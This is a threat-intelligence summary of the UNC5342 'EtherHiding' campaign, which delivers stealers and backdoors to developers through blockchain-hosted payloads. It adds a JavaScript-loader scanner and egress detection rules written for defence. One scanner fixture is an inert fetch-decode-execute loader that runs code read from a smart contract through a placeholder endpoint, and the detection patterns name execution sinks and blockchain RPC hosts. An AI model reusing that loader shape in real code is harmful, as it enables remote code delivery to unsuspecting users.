Google Threat Intelligence observed UNC5342 (also tracked as CL-STA-0240, DeceptiveDevelopment, Famous Chollima and Void Dokkaebi, among other names) using EtherHiding, the embedding of encrypted payloads in smart contracts on decentralised networks such as Ethereum and BNB Smart Chain, to deliver malware since February 2025.
The victims are developers in the crypto, fintech and software sectors, recruited via LinkedIn and lured onto Telegram/Discord; the malicious artifacts are distributed via GitHub and npm. The impact is cross-platform (Windows, macOS, Linux). Data targeted includes MetaMask and Phantom wallets, browser extensions, and password managers (e.g., 1Password).
The social-engineering lure (the “Contagious Interview” scheme) delivers malicious npm/JavaScript loaders. A small loader queries public blockchain smart contracts (read-only calls made through centralized API services) to fetch the encrypted payloads. Infection chain: npm initial downloader → BeaverTail stealer (JS) → JADESNOW loader → InvisibleFerret (JS/Python backdoor). The attackers can update the on-chain payload at will (average gas cost ≈ $1.37 per update) and switch chains to evade tracking.
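The loader shape described above (a read-only smart-contract call whose result is decoded and executed) is something a package reviewer can triage statically. The following scanner is an added example written for this summary, not code from Google's report or from the campaign: it scores a JavaScript source text on the co-occurrence of a JSON-RPC `eth_call`, a contract address, data decoding and a dynamic-execution sink. The pattern names, weights, threshold and the two constructed fixtures (with a placeholder contract address) are this example's own assumptions, not published indicators.

```python
"""Static triage of JavaScript for the on-chain dead-drop loader shape.

Added example (not from the Google report): a heuristic scanner that scores a
script on the co-occurrence of a read-only JSON-RPC smart-contract call, a
contract address, data decoding and dynamic execution of what was fetched.
Any one indicator is common in legitimate web3 code; the combination is what
a package reviewer wants surfaced. Pattern names, weights and the threshold
are this example's own choices, not indicators published by Google.
"""
import re
from dataclasses import dataclass, field

# Indicator patterns. "eth_call" is the standard read-only JSON-RPC method;
# the execution sinks are ordinary JavaScript. No campaign identifiers here.
RPC_CALL = re.compile(r'["\']eth_call["\']')
CONTRACT_ADDR = re.compile(r'0x[0-9a-fA-F]{40}\b')
DYNAMIC_EXEC = re.compile(r'\beval\s*\(|new\s+Function\s*\(|vm\.runInThisContext\s*\(')
DECODE = re.compile(r'Buffer\.from\s*\([^)]*["\']hex["\']|\batob\s*\(|decrypt|createDecipheriv')
NET_FETCH = re.compile(r'\bfetch\s*\(|axios\.(?:get|post)\s*\(|https?\.request\s*\(')

WEIGHTS = {
    "json_rpc_eth_call": (RPC_CALL, 3),
    "contract_address": (CONTRACT_ADDR, 1),
    "dynamic_exec": (DYNAMIC_EXEC, 3),
    "decode_or_decrypt": (DECODE, 1),
    "network_fetch": (NET_FETCH, 1),
}
COMBO_BONUS = 3   # chain read feeding dynamic execution: the dead-drop loader shape
THRESHOLD = 7     # assumption: tuned so a plain balance lookup stays below it


@dataclass
class Finding:
    score: int
    hits: list = field(default_factory=list)


def triage(source: str) -> Finding:
    """Score one JavaScript source text; returns the score and matched indicators."""
    hits = [name for name, (pat, _) in WEIGHTS.items() if pat.search(source)]
    score = sum(WEIGHTS[name][1] for name in hits)
    if "json_rpc_eth_call" in hits and "dynamic_exec" in hits:
        score += COMBO_BONUS
    return Finding(score, hits)


def verdict(finding: Finding, threshold: int = THRESHOLD) -> str:
    return "suspicious" if finding.score >= threshold else "benign"


# Constructed fixtures (not real samples). Placeholder contract address.
ADDR = "0x" + "ab" * 20

# A routine ERC-20 balance lookup: chain read, no execution of the result.
BENIGN_SNIPPET = f"""
const res = await fetch(RPC_URL, {{ method: "POST", body: JSON.stringify({{
  jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{{ to: "{ADDR}", data: "0x70a08231" }}, "latest"] }}) }});
const balance = (await res.json()).result;
"""

# Inert fragment with the loader shape: chain read, hex decode, then execution.
SUSPECT_SNIPPET = f"""
const r = await fetch(RPC_URL, {{ method: "POST", body: JSON.stringify({{
  method: "eth_call", params: [{{ to: "{ADDR}", data: "0x" }}, "latest"] }}) }});
const hex = (await r.json()).result.slice(2);
new Function(Buffer.from(hex, "hex").toString())();
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SNIPPET), ("suspect", SUSPECT_SNIPPET)):
        f = triage(src)
        print(f"{label}: score={f.score} hits={f.hits} -> {verdict(f)}")
```

Run it over every `.js` file in a package before install (lifecycle scripts included); treat a "suspicious" verdict as a reason for manual review rather than an automatic block, since legitimate dApp tooling also reads contracts, and keep the threshold above the score a plain balance lookup produces.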
The campaign enables credential and wallet theft, persistent remote access for long-term espionage, and direct siphoning of cryptocurrency from targeted wallets. Immutable on-chain hosting prevents traditional takedowns and obscures attribution.
No software patch applies: the blockchain itself is not vulnerable, it is merely abused as hosting. Google published indicators, contract addresses and hashes, and some API providers have begun throttling suspicious access. Mitigations: enforce execution/download policies, block or monitor blockchain API endpoints, vet npm/GitHub packages, enable enterprise Safe Browsing, apply EDR and credential-theft detections, and restrict portable Python execution.
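Two of the mitigations above, monitoring blockchain API endpoints and restricting portable Python, translate directly into telemetry rules. The code below is an added example for this summary, not from Google's report: it runs two rules over a constructed key=value egress/process log. Rule 1 flags a connection to a public blockchain RPC host made by a script runtime (node, python) rather than a browser; rule 2 flags a runtime executing from a user-writable location. The RPC hostnames are an illustrative list of well-known public gateways chosen for the example; the report's own indicator list is not reproduced, and the log format is this example's own.

```python
"""Egress and process telemetry rules for the mitigations listed above.

Added example (not from the Google report): two detection rules run over a
constructed key=value telemetry log. Rule 1 flags connections to public
blockchain RPC hosts from script runtimes (node, python) rather than a
browser. Rule 2 flags a runtime executing from a user-writable location,
the "portable Python" case. The RPC hostnames are an illustrative list of
well-known public endpoints chosen for this example only.
"""
import re

# Assumption: hostnames of well-known public RPC gateways, as examples only.
BLOCKCHAIN_RPC_HOSTS = {
    "cloudflare-eth.com",
    "mainnet.infura.io",
    "eth-mainnet.g.alchemy.com",
    "bsc-dataseed.binance.org",
}
SCRIPT_RUNTIMES = {"node", "python", "python3", "pythonw"}
USER_WRITABLE_MARKERS = ("/tmp/", "/downloads/", "\\downloads\\", "\\appdata\\local\\temp\\")

# Constructed telemetry lines (format is this example's own, not a vendor's).
SAMPLE_LOG = [
    "ts=2025-03-04T10:12:01Z host=dev-ws-07 proc=/usr/bin/node dst=bsc-dataseed.binance.org:443",
    "ts=2025-03-04T10:12:05Z host=dev-ws-07 proc=/usr/bin/firefox dst=mainnet.infura.io:443",
    r"ts=2025-03-04T10:13:40Z host=dev-ws-12 proc=C:\Users\dev\Downloads\py\python.exe dst=registry.npmjs.org:443",
    r"ts=2025-03-04T10:13:52Z host=dev-ws-12 proc=C:\Users\dev\Downloads\py\python.exe dst=cloudflare-eth.com:443",
    "ts=2025-03-04T10:15:00Z host=build-01 proc=/usr/bin/node dst=registry.npmjs.org:443",
]


def parse(line: str) -> dict:
    """Split 'k=v k=v' tokens; values contain no spaces in this format."""
    return dict(tok.split("=", 1) for tok in line.split())


def runtime_name(proc_path: str) -> str:
    """Basename without .exe, lowercase, for either path separator."""
    base = re.split(r"[\\/]", proc_path)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def rules_for(event: dict) -> list:
    """Apply both rules to one parsed event; returns the rule names that fired."""
    alerts = []
    name = runtime_name(event["proc"])
    dst_host = event["dst"].rsplit(":", 1)[0].lower()
    if name in SCRIPT_RUNTIMES and dst_host in BLOCKCHAIN_RPC_HOSTS:
        alerts.append("rpc_from_script_runtime")
    if name in SCRIPT_RUNTIMES and any(m in event["proc"].lower() for m in USER_WRITABLE_MARKERS):
        alerts.append("portable_runtime")
    return alerts


def analyze(lines) -> list:
    """Return one alert dict per (event, rule) match, in log order."""
    out = []
    for line in lines:
        ev = parse(line)
        for rule in rules_for(ev):
            out.append({"ts": ev["ts"], "host": ev["host"], "rule": rule,
                        "proc": ev["proc"], "dst": ev["dst"]})
    return out


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

On the sample log the browser session to an RPC gateway produces nothing, while `node` reaching a gateway and `python.exe` running from a Downloads folder each raise an alert; an event that matches both rules is the one to escalate first. Replace the hostname set with the provider list you actually want monitored, and feed the rules from whatever proxy or EDR export your environment produces.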
Nation-state actors now weaponize decentralised ledgers as takedown-resistant C2 and dead-drops; defenders must treat blockchain access as a monitored attack surface and harden developer supply-chain controls.